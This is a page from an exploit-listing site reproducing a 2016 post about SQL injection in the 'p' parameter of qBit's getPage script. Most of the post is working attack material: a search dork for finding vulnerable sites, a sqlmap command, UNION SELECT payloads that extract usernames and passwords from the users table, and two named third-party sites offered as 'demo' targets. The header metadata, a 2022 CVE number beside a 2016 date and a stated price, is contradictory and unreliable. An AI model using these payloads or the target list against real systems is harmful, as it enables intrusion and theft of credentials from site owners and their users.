Advertisement






qBit getPage Parameter SQL Injection

CVE Category Price Severity
CVE-2022-22064 CWE-89 $10,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2016-08-22
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.27269 0.90566

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016080209

Below is a copy:

qBit getPage Parameter SQL Injection# ############################
# Exploit Title  : qBit 'getPage'  - 'p' Parameter SQL Injection
# Exploit Dork   : allinurl:"getPage?p="
# Exploit Date   : 19/08/2016
# Discovered By  : Dervish 
# Content  Me    : fb.com/alakber
#                  [email protected]
# Special Thanks : S3N4TOR , S4RC4SM , Region 20
# Greetz To      :  All Azerbaijan Hackers
# Tested On      : Kali , Ubuntu , Windows 7
# ############################
# Exploit 
# http://127.0.0.1/pages/getPage?p={parametr}"
# Admin Page 
# http://127.0.0.1/admin
# ############################
# SQLMAP Poc
# ./sqlmap.py  -u http://127.0.0.1/pages/getPage?p=parametr --dbs
# [+++++++++++++++++++++++++++]
# Manual Poc
# Login Data    : http://127.0.0.1/pages/getPage?p=-parametr" Union Select login,2,3,4,5,6,7,8,9 from users--+-" 
# Password Data : http://127.0.0.1/pages/getPage?p=-parametr" Union Select password,2,3,4,5,6,7,8,9 from users--+-" 
# ############################
# Demo Sites
# http://troy-vavilon.com/pages/getPage?p=gallery
# www.testbitep.net/aral/pages/pages/getPage?p=prom
# ############################
# Watch the video
# https://www.youtube.com/watch?v=-5Uy8DFzuHE
##############################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum